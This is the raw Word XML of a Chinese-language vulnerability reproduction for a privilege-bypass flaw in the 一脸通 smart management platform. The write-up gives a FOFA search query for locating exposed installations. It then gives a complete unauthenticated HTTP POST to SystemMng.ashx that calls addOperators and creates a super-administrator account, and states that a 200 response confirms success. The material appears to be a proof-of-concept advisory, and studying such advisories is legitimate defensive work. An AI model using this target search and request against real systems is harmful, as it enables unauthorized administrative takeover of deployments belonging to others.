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CA117" w14:textId="76F86820" w:rsidR="00A35BA1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一脸通智慧管理平台权限绕过漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CEC30" w14:textId="77777777" w:rsidR="00A35BA1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="oSuZm"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CADB898" w14:textId="77777777" w:rsidR="00A35BA1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="u45dd6e23"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞，导致特权管理不当，未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F59D1" w14:textId="77777777" w:rsidR="00A35BA1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="sVgyU"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59755C0C" w14:textId="77777777" w:rsidR="00A35BA1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="u351fbf9e"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤一、使用以下fofa语句进行资产收集，确认测试目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06593040" w14:textId="77777777" w:rsidR="00A35BA1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  <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="UlXqp"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>title="欢迎</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用脸爱云</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 一脸通智慧管理平台"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="269CAC57" w14:textId="77777777" w:rsidR="00A35BA1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="u5f2501d7"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤二、用burp抓包向网站发送如下数据包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638C5C12" w14:textId="77777777" w:rsidR="00A35BA1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6" w:name="LBhVj"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /SystemMng.ashx HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept: */*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept-Language: en</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Length: 174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>operatorName=test123456&amp;operatorPwd=123456&amp;operpassword=123456&amp;operatorRole=00&amp;visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&amp;visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&amp;funcName=addOperators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB50FE8" w14:textId="77777777" w:rsidR="00A35BA1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="ub3b2c887"/>
      <w:bookmarkStart w:id="8" w:name="u4ee7622a"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F26CA38" wp14:editId="2E289638">
            <wp:extent cx="5841999" cy="1039831"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="703883370" name="图片 703883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96400" cy="165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u6f8ee27f"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6617ADF2" wp14:editId="35790152">
            <wp:extent cx="2370667" cy="1424838"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="696226479" name="图片 696226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0667" cy="142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2F300A4E" w14:textId="77777777" w:rsidR="00A35BA1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="u6f0c6152"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤三、响应200即成功创建账号为数据包内容，登陆后台可以看到自己创建的账号拥有管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61080FB3" w14:textId="77777777" w:rsidR="00A35BA1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11" w:name="f4Hxj"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>test123456      123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9336E" w14:textId="771BE5DA" w:rsidR="00A35BA1" w:rsidRDefault="00000000" w:rsidP="00444C37">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="u311ecaf1"/>
      <w:bookmarkStart w:id="13" w:name="u803053a9"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E34698C" wp14:editId="3BC219FE">
            <wp:extent cx="5842000" cy="2295906"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="453264029" name="图片 453264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0" cy="459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nhN3S"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:sectPr w:rsidR="00A35BA1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A35BA1"/>
    <w:rsid w:val="00444C37"/>
    <w:rsid w:val="009F44E4"/>
    <w:rsid w:val="00A3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E722"/>
  <w15:docId w15:val="{03C52AA4-1B5E-48CD-98F1-9D6B36E7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467886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ae"/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鹏 王</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-02T09:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-02T09:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>